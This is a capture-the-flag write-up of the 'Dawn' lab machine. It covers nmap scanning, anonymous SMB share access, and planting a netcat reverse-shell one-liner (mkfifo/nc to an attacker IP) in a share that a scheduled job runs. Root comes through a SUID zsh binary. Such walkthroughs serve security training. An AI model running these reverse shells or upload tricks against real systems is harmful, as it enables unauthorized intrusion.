# Dawn ## Nmap ``` sudo nmap 192.168.152.11 -p- -sS -sV PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.38 ((Debian)) 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 3306/tcp open mysql MySQL 5.5.5-10.3.15-MariaDB-1 Service Info: Host: DAWN ``` On port 445 we are able to list shares without credentials. We see the share ITDEPT is open to us. ``` smbclient -U '' -L \\\\192.168.152.11\\ ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-2882a9ef2c440c761bc8fd7dbde3caca5ead732b%2Fimage.png?alt=media) Connecting then directly to the ITDEPT share. ``` smbclient -U '' \\\\192.168.152.11\\ITDEPT ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-c6c5d389dd0f5ebc089628aed4769f45256c1e76%2Fimage.png?alt=media) I then used `curl` to test for file upload on the share and confirmed was able to upload a PHP reverse shell which might come in handy for later. ``` curl --upload-file /home/kali/scripts/phpshell.php -u '' smb://192.168.152.11/ITDEPT//phpshell.php ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-ab948668f761e41b57258df14b0c228b2962a6da%2Fimage.png?alt=media) Running `dirsearch.py` on port 80 reveals two interesting directories. ``` python3 dirsearch.py -u http://192.168.152.11 -w /usr/share/seclists/Discovery/Web-Content/big.txt -t 60 --full-url ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-e2d5f7ae07820b3eeae399605ba4275b78fd9b62%2Fimage.png?alt=media) Moving into logs shows the a list of logs where management.log is the only one we have permission to access ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-1f30fdd5984a308d56e2a602e63f15dc5330812e%2Fimage.png?alt=media) When reading the log file we have the lines below appearing frequently. ``` 2020/08/12 09:25:0 CMD: UID=33 PID=1360 | /bin/sh -c /home/dawn/ITDEPT/web-control 2020/08/12 09:25:0 CMD: UID=1000 PID=1359 | /bin/sh -c /home/dawn/ITDEPT/product-control ``` Knowing that we have write access to the ITDEPT share we can upload a reverse shell call it web-control and in theory this should execute. Firstly I created a file called web-control and inserted a `netcat` reverse shell into it ``` rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.49.152 80 >/tmp/f ``` This was then uploaded to the SMB share. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-db292127dfe563d76f068bad86df07977280daea%2Fimage.png?alt=media) After doing so I soon receive a shell back on my `netcat` listener. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-eafc186d1aa63a9163dc5c58cc8e7747bc1c73b1%2Fimage.png?alt=media) Then we can upgrade the shell to something nicer. ``` python -c 'import pty; pty.spawn("/bin/bash")' ``` After doing so I then transferred over `linpeas` from my attacking machine by uploading to SMB. After running linpeas we identify the binary `zsh` as having the SUID bit set. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-aa105ce8cc5990bf08f0c191fbc7aca798feceea%2Fimage.png?alt=media) As `zsh` is a shell binary all we need to do is execute the full path of `zsh` to gain a root shell. ``` /usr/bin/zsh ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-75bfea58de950d9145ed62356d36870880dc8494%2Fimage.png?alt=media) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://viperone.gitbook.io/pentest-everything/writeups/pg-play-or-vulnhub/linux/dawn.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.